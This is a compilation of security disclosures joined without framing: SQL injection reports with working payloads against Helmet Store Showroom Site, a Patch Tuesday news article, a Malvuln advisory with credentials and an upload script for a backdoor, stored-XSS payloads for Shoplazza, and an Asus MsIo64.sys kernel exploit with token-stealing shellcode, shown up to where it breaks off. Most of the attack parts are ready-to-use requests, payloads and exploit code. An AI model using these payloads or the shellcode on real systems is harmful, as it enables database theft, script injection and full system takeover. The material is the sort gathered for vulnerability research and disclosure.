Helmet Store Showroom Site v1.0 is vulnerable to SQL Injection via /hss/admin/categories/view_category.php?id=.

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

BUG\_Author: HMHYHM

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /hss/admin/categories/view\_category.php?id=

Vulnerability location: /hss/admin/categories/view\_category.php?id=,id

dbname =hss\_db,length=6

\[+\] Payload: /hss/admin/categories/view\_category.php?id=-5%27%20union%20select%201,database(),3,4,5,6--+ // Leak place ---> id

GET /hss/admin/categories/view\_category.php?id\=\-5%27%20union%20select%201,database(),3,4,5,6\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close

CVE-2022-46122: bug_report/SQLi-6.md at main · HMHYHM/bug_report

Helmet Store Showroom Site v1.0 is vulnerable to SQL Injection via /hss/?page=categories&c=.

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

BUG\_Author: HMHYHM

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /hss/?page=categories&c=

Vulnerability location: /hss/?page=categories&c=, c

dbname =hss\_db,length=6

\[+\] Payload: /hss/?page=categories&c=-2%27%20union%20select%201,database(),3,4,5,6--+ // Leak place ---> c

GET /hss/?page\=categories&c\=\-2%27%20union%20select%201,database(),3,4,5,6\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close

CVE-2022-46119: bug_report/SQLi-3.md at main · HMHYHM/bug_report

Helmet Store Showroom Site v1.0 is vulnerable to SQL Injection via /hss/?page=product_per_brand&bid=.

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

BUG\_Author: HMHYHM

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /hss/?page=product\_per\_brand&bid=

Vulnerability location: /hss/?page=product\_per\_brand&bid=, id

dbname =hss\_db,length=6

\[+\] Payload: /hss/?page=product\_per\_brand&bid=-2%27%20union%20select%201,database(),3,4,5,6--+ // Leak place ---> bid

GET /hss/?page\=product\_per\_brand&bid\=\-2%27%20union%20select%201,database(),3,4,5,6\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close

CVE-2022-46118: bug_report/SQLi-2.md at main · HMHYHM/bug_report

Helmet Store Showroom Site v1.0 is vulnerable to SQL Injection via /hss/admin/?page=user/manage_user&id=.

Permalink

Cannot retrieve contributors at this time

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

BUG\_Author: HMHYHM

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /hss/admin/?page=user/manage\_user&id=

Vulnerability location: /hss/admin/?page=user/manage\_user&id=,id

dbname =hss\_db,length=6

\[+\] Payload: /hss/admin/?page=user/manage\_user&id=3%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /hss/admin/?page\=user/manage\_user&id\=3%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close

CVE-2022-46124: bug_report/SQLi-9.md at main · HMHYHM/bug_report

Helmet Store Showroom Site v1.0 is vulnerable to SQL Injection via /hss/admin/?page=products/view_product&id=.

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

BUG\_Author: HMHYHM

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /hss/admin/?page=products/view\_product&id=

Vulnerability location: /hss/admin/?page=products/view\_product&id=,id

dbname =hss\_db,length=6

\[+\] Payload: /hss/admin/?page=products/view\_product&id=-2%27%20union%20select%201,2,3,4,database(),6,7,8,9,10,11,12,13--+ // Leak place ---> id

GET /hss/admin/?page\=products/view\_product&id\=\-2%27%20union%20select%201,2,3,4,database(),6,7,8,9,10,11,12,13\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close

CVE-2022-46120: bug_report/SQLi-4.md at main · HMHYHM/bug_report

Helmet Store Showroom Site v1.0 is vulnerable to SQL Injection via /hss/admin/?page=products/manage_product&id=.

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

BUG\_Author: HMHYHM

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /hss/admin/?page=products/manage\_product&id=

Vulnerability location: /hss/admin/?page=products/manage\_product&id=,id

dbname =hss\_db,length=6

\[+\] Payload: /hss/admin/?page=products/manage\_product&id=-2%27%20union%20select%201,2,3,4,database(),6,7,8,9,10--+ // Leak place ---> id

GET /hss/admin/?page\=products/manage\_product&id\=\-2%27%20union%20select%201,2,3,4,database(),6,7,8,9,10\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close

CVE-2022-46121: bug_report/SQLi-5.md at main · HMHYHM/bug_report

Microsoft has released its final monthly batch of security updates for 2022, fixing more than four dozen security holes in its various Windows operating systems and related software. The most pressing patches include a zero-day vulnerability in a Windows feature that tries to flag malicious files from the Web, a critical bug in PowerShell, and a dangerous flaw in Windows 11 systems that was detailed publicly prior to this week's Patch Tuesday.

**Microsoft** has released its final monthly batch of security updates for 2022, fixing more than four dozen security holes in its various **Windows** operating systems and related software. The most pressing patches include a zero-day in a Windows feature that tries to flag malicious files from the Web, a critical bug in **PowerShell**, and a dangerous flaw in **Windows 11** systems that was detailed publicly prior to this week’s Patch Tuesday.

The security updates include patches for **Azure**, **Microsoft Edge,** **Office**, **SharePoint Server**, **SysInternals**, and the **.NET framework**. Six of the update bundles earned Microsoft’s most dire “critical” rating, meaning they fix vulnerabilities that malware or malcontents can use to remotely commandeer an unpatched Windows system — with little to no interaction on the part of the user.

The bug already seeing exploitation is CVE-2022-44698, which allows attackers to bypass the Windows SmartScreen security feature. The vulnerability allows attackers to craft documents that won’t get tagged with Microsoft’s “Mark of the Web,” despite being downloaded from untrusted sites.

“This means no Protected View for Microsoft Office documents, making it easier to get users to do sketchy things like execute malicious macros,  
said **Greg Wiseman**, product manager at security firm **Rapid7**. This is the second Mark of the Web flaw Microsoft has patched in as many months; both were first publicly detailed over the past two months on Twitter by security researcher Will Dormann.

Publicly disclosed (but not actively exploited for now) is CVE-2022-44710, which is an elevation of privilege flaw in the DirectX graphics component of Windows 11.

Another notable critical bug is CVE-2022-41076, a remote code execution flaw in PowerShell — a key component of Windows that makes it easier to automate system tasks and configurations.

**Kevin Breen** at **Immersive Labs** said while Microsoft doesn’t share much detail about CVE-2022-41076 apart from the designation ‘Exploitation More Likely,’ they also note that successful exploitation requires an attacker to take additional actions to prepare the target environment.

“What actions are required is not clear; however, we do know that exploitation requires an authenticated user level of access,” Breen said. “This combination suggests that the exploit requires a social engineering element, and would likely be seen in initial infections using attacks like MalDocs or LNK files.”

Speaking of malicious documents, **Trend Micro’s Zero Day Initiative** highlights CVE-2022-44713, a spoofing vulnerability in **Outlook for Mac**.

“We don’t often highlight spoofing bugs, but anytime you’re dealing with a spoofing bug in an e-mail client, you should take notice,” ZDI’s **Dustin Childs** wrote. “This vulnerability could allow an attacker to appear as a trusted user when they should not be. Now combine this with the SmartScreen Mark of the Web bypass and it’s not hard to come up with a scenario where you receive an e-mail that appears to be from your boss with an attachment entitled “Executive\_Compensation.xlsx”. There aren’t many who wouldn’t open that file in that scenario.”

Microsoft also released guidance on reports that certain software drivers certified by Microsoft’s Windows Hardware Developer Program were being used maliciously in post-exploitation activity.

Three different companies reported evidence that malicious hackers were using these signed malicious driver files to lay the groundwork for ransomware deployment inside victim organizations. One of those companies, **Sophos**, published a blog post Tuesday detailing how the activity was tied to the Russian ransomware group **Cuba**, which has extorted an estimated $60 million from victims since 2019.

Of course, not all scary and pressing security threats are Microsoft-based. Also on Tuesday, **Apple** released a bevy of security updates to iOS, iPadOS, macOS, tvOS and Safari, including  a patch for a newly discovered zero-day vulnerability that could lead to remote code execution.

Anyone responsible for maintaining **Fortinet** or **Citrix** remote access products probably needs to update, as both are dealing with active attacks on just-patched flaws.

For a closer look at the patches released by Microsoft today (indexed by severity and other metrics) check out the always-useful Patch Tuesday roundup from the **SANS Internet Storm Center**. And it’s not a bad idea to hold off updating for a few days until Microsoft works out any kinks in the updates: AskWoody.com usually has the lowdown on any patches that may be causing problems for Windows users.

As always, please consider backing up your system or at least your important documents and data before applying system updates. And if you run into any problems with these updates, please drop a note about it here in the comments.

Microsoft Patch Tuesday, December 2022 Edition

Backdoor.Win32.InCommander.17.b malware suffers from a hardcoded credential vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/dd76d8a5874bf8bf05279e35c68449ca.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnBackup media: infosec.exchange/@malvulnThreat: Backdoor.Win32.InCommander.17.bVulnerability: Hardcoded Cleartext CredentialsFamily: InCommanderType: PE32MD5: dd76d8a5874bf8bf05279e35c68449caVuln ID: MVID-2022-0665Dropped files: incsrv.exeDisclosure: 12/14/2022Description: The malware listens on TCP port 9400 and 9401 and requires authentication. However, the username "IncUser-b3" is stored in cleartext in a file named "incsrv.drv" under Windows dir. The password "InClientMainPassword" is also stored in cleartext but within the PE file "incsrv.exe" at offset 000958d0.Third-party adversaries may then upload thier own executables using ftp PASV, STOR commands.Exploit/PoC:C:\>nc64.exe 192.168.18.125 9401220 InCommad FTP Server ready.USER IncUser-b3331 Password required for IncUser-b3.PASS InClientMainPassword230 User IncUser-b3 logged in.SYST215 UNIX Type: L8 Internet Component SuitePASV227 Entering Passive Mode (192,168,18,125,241,155).CDUP \250 CWD command successful. "C:/" is current directory.STOR DOOM_SM.exe150 Opening data connection for DOOM_SM.exe.226 File received okfrom socket import *MALWARE_HOST="192.168.18.125"PORT=61851DOOM="DOOM_SM.exe"def doit():    s=socket(AF_INET, SOCK_STREAM)    s.connect((MALWARE_HOST, PORT))    f = open(DOOM, "rb")    EXE = f.read()    s.send(EXE)    while EXE:        s.send(EXE)        EXE=f.read()    s.close()    print("By Malvuln");if __name__=="__main__":    doit()Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.InCommander.17.b MVID-2022-0665 Hardcoded Credentials

Shoplazza version 1.1 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Shoplazza 1.1 - Stored Cross Site Scripting# Exploit Author: Andrey Stoykov# Software Link: https://github.com/Shoplazza/LifeStyle# Version: 1.1# Tested on: Ubuntu 20.04Stored XSS #1:To reproduce do the following:1. Login as normal user account2. Browse "Blog Posts" -> "Manage Blogs" -> "Add Blog Post"3. Select "Title" and enter payload "><script>alert(1)</script>// HTTP POST request showing XSS payloadPATCH /admin/api/admin/articles/2dc688b1-ac9e-46d7-8e56-57ded1d45bf5 HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0[...]{"article":{"id":"2dc688b1-ac9e-46d7-8e56-57ded1d45bf5","title":"Title\"><script>alert(1)</script>","excerpt":"Excerpt\"><script>alert(2)</script>","content":"<p>\"><script>alert(3)</script></p>"[...]// HTTP response showing unsanitized XSS payloadHTTP/1.1 200 OKContent-Type: application/json; charset=utf-8[...]{"article":{"title":"Title\"><script>alert(1)</script>","excerpt":"Excerpt\"><script>alert(2)</script>","published":true,"seo_title":"Title\"><script>alert(1)</script>"[...]// HTTP GET request to trigger XSS payloadGET /blog/titlescriptalert1script?st=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2NzAzMzE5MzYsInN0b3JlX2lkIjo1MTA0NTksInVzZXJfaWQiOiI4NGY4Nzk4ZC03ZGQ1LTRlZGMtYjk3Yy02MWUwODk5ZjM2MDgifQ.9ybPJCtv6Lzf1BlDy-ipoGpXajtl75QdUKEnfj9L49I HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0[...]// HTTP response showing unsanitized XSS payloadHTTP/1.1 200 OKContent-Type: text/html; charset=UTF-8[...]<meta name="viewport" content="width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,user-scalable=no,viewport-fit=cover"><title>Title"><script>alert(1)</script></title><meta name="keywords" content="test1205">[...]Stored XSS #2:To reproduce do the following:1. Login as normal user account2. Browse "Products" -> "Create Product"3. Select "Subtitle" and enter payload "><script>alert(1)</script>// HTTP POST request showing XSS payloadPOST /admin/api/admin/v2_products HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0[...]{"product":{"id":"","title":"Title","brief":"Subtitle\"><script>alert(1)</script>","description":"<p>Description</p>"[...]// HTTP response showing unsanitized XSS payloadHTTP/1.1 200 OKContent-Type: application/json; charset=utf-8[...]{"product":{"brief":"Subtitle\"\u003e\u003cscript\u003ealert(1)\u003c/script\u003e","category_id":"","collections[...]Stored XSS #3:To reproduce do the following:1. Login as normal user account2. Browse "Online Store" -> "Themes" -> "Customize" -> "Announcement"3. Select "Text" section and enter payload "><script>alert(1)</script>4. Select "Mobile Text" section and enter payload "><script>alert(1)</script>// HTTP POST request showing XSS payloadPATCH /admin/api/theme-edit/442430617951435468/temp-template-datas/061cf44d-f20e-42f4-9cde-54a74f240fef/sections/announcement HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0// HTTP response showing unsanitized XSS payload{"section":{"type":"announcement","settings":{"enable_view_all":true},"blocks":[{"type":"announcement","settings":{"text":"Announcement\"><script>alert('Announcement')</script>","mobile_text":"Mobile Text\"><script>alert('Mobile Text')</script>\n","countdown_time":1,"link":null,"link_text":"Shop now"}},{"type":"announcement","settings":{"text":"Welcome to our store","mobile_text":"Welcome to our store","countdown_time":1,"link":null,"link_text":"Shop [...]Stored XSS #4:1. Login as normal user account2. Browse "Online Store" -> "Themes" -> "Customize" -> "Product" 3. Select "Subheading" and enter payload "><script>alert(1)</script>3. Select "Heading" and enter payload "><script>alert(1)</script>4. Select "Text" and enter payload "><script>alert(1)</script>5. Select "Button Text" and enter payload "><script>alert(1)</script>6. Select "Label" and enter payload "><script>alert(1)</script>// HTTP POST request showing XSS payloadPATCH /admin/api/theme-edit/442439399796402892/temp-template-datas/2f973e0e-6711-4e5f-8f55-8f34b4bdbd31/sections/1664528667835 HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0[...]{"section":{"name":"feature_product","cname":{"en-US":"Feature Product","zh-CN":""},"category":{"en-US":"Promotion","zh-CN":""},"ccategory":{"en-US":"Promotion","zh-CN":""},"display":true,"blocks":[{"type":"Product","settings":{"auto_display":true,"subheading":"Products\"><script>alert('Product')</script>","heading":"Product_Subheading\"><script>alert('Product_Subheading')</script>","text":"Product_Text\"><script>alert('Product_Text')</script>","btn_text":"Button_Text\"><script>alert('Button_Text')</script>","label_text":"Label_Text\"><script>alert('Label_Text')</script>",[...]// HTTP response showing unsanitized XSS payloadHTTP/1.1 200 OKContent-Type: application/json; charset=UTF-8[...]{"section":{"name":"feature_product","cname":{"en-US":"Feature Product","zh-CN":""},"category":{"en-US":"Promotion","zh-CN":""},"ccategory":{"en-US":"Promotion","zh-CN":""},"display":true,"blocks":[{"type":"Product","settings":{"auto_display":true,"subheading":"Products\"><script>alert('Product')</script>","heading":"Product_Subheading\"><script>alert('Product_Subheading')</script>","text":"Product_Text\"><script>alert('Product_Text')</script>","btn_text":"Button_Text\"><script>alert('Button_Text')</script>","label_text":"Label_Text\"><script>alert('Label_Text')</script>"[...]Stored XSS #5:1. Login as normal user account2. Browse "Online Store" -> "Themes" -> "Customize" -> "Product Carousel" 3. Select "Heading" and enter payload "><script>alert(1)</script>4. Select "Description" and enter payload "><script>alert(1)</script>// HTTP POST request showing XSS payloadPATCH /admin/api/theme-edit/442439399796402892/temp-template-datas/2f973e0e-6711-4e5f-8f55-8f34b4bdbd31/sections/1664529790755 HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0[...]{"section":{"name":"product_carousel","cname":{"en-US":"Products carousel","zh-CN":""},"category":{"en-US":"Product","zh-CN":""},"category":{"en-US":"Product","zh-CN":""},"icon":"oss/operation/cbff8870e3db05817270bcb0e8c52870.svg","display":true,"settings":{"heading":" Products Carousel\"><script>alert('Product Carousel')</script>","auto_display":true,"collection":null,"desc":"Product Description\"><script>alert('Product Description')</script>[...]// HTTP response showing unsanitized XSS payloadHTTP/1.1 200 OKContent-Type: application/json; charset=UTF-8[...]{"heading":" Products Carousel\"><script>alert('Product Carousel')</script>","auto_display":true,"collection":null,"desc":"Product Description\"><script>alert('Product Description')</script>"[...]\">Product Description\"><script>alert('Product Description')</script>[...]Stored XSS #6:1. Login as normal user account2. Browse "Online Store" -> "Themes" -> "Customize" -> "Text with Icons" -> "Free Shipping"3. Select "Heading" and enter payload "><script>alert(1)</script>4. Select "Text" and enter payload "><script>alert(1)</script>5. Browse "Online Store" -> "Themes" -> "Customize" -> -> "Text with Icons" -> "Free Shipping" Worldwide Shipping"6. Select "Heading" and enter payload "><script>alert(1)</script>7. Select "Text" and enter payload "><script>alert(1)</script>8. Browse "Online Store" -> "Themes" -> "Customize" -> -> "Text with Icons" -> "Member Discount"9. Select "Heading" and enter payload "><script>alert(1)</script>10. Select "Text" and enter payload "><script>alert(1)</script>11. Browse "Online Store" -> "Themes" -> "Customize" -> -> "Text with Icons" -> "Icon"12. Select "Heading" and enter payload "><script>alert(1)</script>13. Select "Text" and enter payload "><script>alert(1)</script>// HTTP POST request showing XSS payloadPATCH /admin/api/theme-edit/442443380824229324/temp-template-datas/2f973e0e-6711-4e5f-8f55-8f34b4bdbd31/sections/1664529794334 HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0[...]{"section":{"name":"icon_text","cname":{"zh-CN":"","en-US":"Text with icons"},"category":{"en-US":"Image with text","zh-CN":""},"ccategory":{"en-US":"Image with text","zh-CN":""},"icon":"oss/operation/b3117ddd140480a503655c157b1af934.svg","display":true,"blocks":[{"type":"icon","settings":{"icon":"free_shipping","heading":"Free shipping\"><script>alert('Free_Shipping')</script>","text":"Free worldwide shipping\"><script>alert('Free world wide shipping')</script>","link":""}},{"type":"icon","settings":{"icon":"customer_service","heading":"Free worldwide shipping\"><script>alert('Free worldwide shipping')</script>","text":"Text\"><script>alert('Text')</script>","link":""}},{"type":"icon","settings":{"icon":"secure_payment","heading":" Member Discount\"><script>alert('Member Discount')</script>","text":"Our payment in formation is processed securely\"><script>alert('Our payment in formation is processed securely')</script>","link":""}},{"type":"icon","settings":{"icon":"contact_us","heading":" Contact us\"><script>alert('Contact us')</script>","text":"Short content about your store\"><script>alert('Short content about your store')</script>"[...]// HTTP response showing unsanitized XSS payload HTTP/1.1 200 OKContent-Type: application/json; charset=UTF-8[...]{"section":{"name":"icon_text","cname":{"zh-CN":"","en-US":"Text with icons"},"category":{"en-US":"Image with text","zh-CN":""},"ccategory":{"en-US":"Image with text","zh-CN":""},"icon":"oss/operation/b3117ddd140480a503655c157b1af934.svg","display":true,"blocks":[{"type":"icon","settings":{"icon":"free_shipping","heading":"Free shipping\"><script>alert('Free_Shipping')</script>","text":"Free worldwide shipping\"><script>alert('Free world wide shipping')</script>","link":""}},{"type":"icon","settings":{"icon":"customer_service","heading":"Free worldwide shipping\"><script>alert('Free worldwide shipping')</script>","text":"Text\"><script>alert('Text')</script>","link":""}},{"type":"icon","settings":{"icon":"secure_payment","heading":" Member Discount\"><script>alert('Member Discount')</script>","text":"Our payment in formation is processed securely\"><script>alert('Our payment in formation is processed securely')</script>","link":""}},{"type":"icon","settings":{"icon":"contact_us","heading":" Contact us\"><script>alert('Contact us')</script>"[...]"><script>alert('Member Discount')</script>","text":"Our payment in formation is processed securely\"><script>alert('Our payment in formation is processed securely')</script>","link":""}},{"type":"icon","settings":{"icon":"contact_us","heading":" Contact us\"><script>alert('Contact us')</script>","text":"Short content about your store\"><script>alert('Short content about your store')</script>[...]Stored XSS #7:1. Login as normal user account2. Browse "Online Store" -> "Themes" -> "Customize" -> "Review Flow"3. Select "Title" and enter payload "><script>alert(1)</script>// HTTP POST request showing XSS payloadPATCH /admin/api/theme-edit/442443380824229324/temp-template-datas/2f973e0e-6711-4e5f-8f55-8f34b4bdbd31/sections/1670588315547 HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0[...]{"section":{"name":{"en-US":"Review Flow","zh-CN":""},"type":"shoplazza://apps/internal-product-reviews-masonry/blocks/review/48597947633379239","settings":{"star_least":"5","with_photo":true,"show_product":true,"title":"Customer Review\"><script>alert('Customer Reviews')</script>[...]HTTP/1.1 200 OKContent-Type: application/json; charset=UTF-8[...]{"section":{"name":{"en-US":"Review Flow","zh-CN":""},"type":"shoplazza://apps/internal-product-reviews-masonry/blocks/review/48597947633379239","settings":{"star_least":"5","with_photo":true,"show_product":true,"title":"Customer Review\"><script>alert('Customer Reviews')</script>"[...]

Shoplazza 1.1 Cross Site Scripting

The MsIo64.sys component in Asus Aura Sync through v1.07.79 does not properly validate input to IOCTL 0x80102040, 0x80102044, 0x80102050, and 0x80102054, allowing attackers to trigger a memory corruption and cause a Denial of Service (DoS) or escalate privileges via crafted IOCTL requests.

The kernel driver MsIo64.sys is included in Asus AuraSync 1.07.79. A stack-based buffer overflow exists in this kernel driver IOCTL dispatch function.

When you download ASUS AURA SYNC software, MsIo64.sys driver is installed together. In the IOCTL code of this driver, the memmove function is called at 0x80102040, but there is no path check at this time, so a stack based buffer overflow vulnerability may occur.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

__int64 __fastcall sub_113F0(__int64 a1, IRP *a2) {
	ULONG_PTR Src[2]; // [rsp+30h] [rbp-48h]
	...
	switch ( LowPart )
	{
		case 0x80102040:
		  DbgPrint("IOCTL_MSIO_MAPPHYSTOLIN");
		  if ( !(_DWORD)Options )
		    goto LABEL_9;
		  memmove(Src, MasterIrp, Options);
		  v11 = sub_FFFFF80375F91090((PHYSICAL_ADDRESS)Src[1], Src[0], &BaseAddress, &Handle, &Object);
		  if ( v11 >= 0 )
		  {
		    memmove(MasterIrp, Src, Options);
		    a2->IoStatus.Information = Options;
		  }
		  a2->IoStatus.Status = v11;
		  break;
	...
}

MasterIrp is lpInBuffer as an argument when calling the DeviceIoControl function. Since lpInBuffer is moved to Src, and the length is not checked, a rop attack is possible by changing the dispatch function return address.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114

#include <stdio.h>
#include <string>
#include <Windows.h>
#include <Psapi.h>
#define IOCTL_CODE 0x80102040
BYTE shellcode_[] =
"\x65\x48\x8B\x14\x25\x88\x01\x00\x00"      // mov rdx, gs:[188h]       ; _ETHREAD
"\x4C\x8B\x82\x20\x02\x00\x00"              // mov r8, [rdx + 220h]     ; _EPROCESS
"\x4D\x8B\x88\x48\x04\x00\x00"              // mov r9, [r8 + 448h]      ; ActiveProcessLinks
"\x49\x8B\x09"                              // mov rcx, [r9]            

// GetProcessByPid
"\x48\x8B\x51\xF8"                          // mov rdx, [rcx - 8]       ; UniqueProcessId
"\x48\x83\xFA\x04"                          // cmp rdx, 4               ; PID 4 SYSTEM process
"\x74\x05"                                  // jz found_system          ; SYSTEM token
"\x48\x8B\x09"                              // mov rcx, [rcx]           ; _LIST_ENTRY Flink
"\xEB\xF1"                                  // jmp find_system_proc     ; While
// FoundGetProcess

"\x48\x8B\x41\x70"                          // mov rax, [rcx + 70h]     ; Get Token
"\x24\xF0"                                  // and al, 0f0h             
// FindProcess

"\x48\x8B\x51\xF8"                          // mov rdx, [rcx-8]         ; UniqueProcessId
"\x48\x81\xFA\x00\x00\x00\x00"              // cmp rdx, 0d54h           ; if UniqueProcessId == CurrentPid
"\x74\x05"                                  // jz found_cmd             ; True - jump FoundProcess
"\x48\x8B\x09"                              // mov rcx, [rcx]           ; False - next entry
"\xEB\xEE"                                  // jmp find_cmd             ; jump FindProcess
// FoundProcess

"\x48\x89\x41\x70"                          // mov [rcx+70h], rax       ; Overwrite SYSTEM token
"\x48\x31\xc0"                              // xor rax rax 
"\x48\x31\xc9"                              // xor rcx rcx              
"\x48\x31\xf6"                              // xor rsi,rsi
"\x48\x31\xff"                              // xor rdi, rdi
"\x4D\x31\xC0"                              // xor r8, r8
"\x48\xc7\xc1\xf8\x06\x35\x00"              // mov rcx, 0x3506f8        ; original cr4
"\xc3";                                     // ret

LPVOID GetBaseAddr(const char* drvname) {
    LPVOID drivers[1024];
    DWORD cbNeeded;
    int nDrivers, i = 0;

    if (EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded) && cbNeeded < sizeof(drivers)) {
        char szDrivers[1024];
        nDrivers = cbNeeded / sizeof(drivers[0]);
        for (i = 0; i < nDrivers; i++) {
            if (GetDeviceDriverBaseNameA(drivers[i], (LPSTR)szDrivers, sizeof(szDrivers) / sizeof(szDrivers[0]))) {
                if (strcmp(szDrivers, drvname) == 0) {
                    return drivers[i];
                }
            }
        }
    }
    return 0;
}

void exploit() {
    DWORD pid = GetCurrentProcessId();
    INT64 ntoskrnl = (INT64)GetBaseAddr("ntoskrnl.exe");
    HANDLE hDevice;

    hDevice = CreateFileA("\\\\.\\MsIo", FILE_READ_ACCESS | FILE_WRITE_ACCESS, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL, NULL);

    if (hDevice == INVALID_HANDLE_VALUE) {
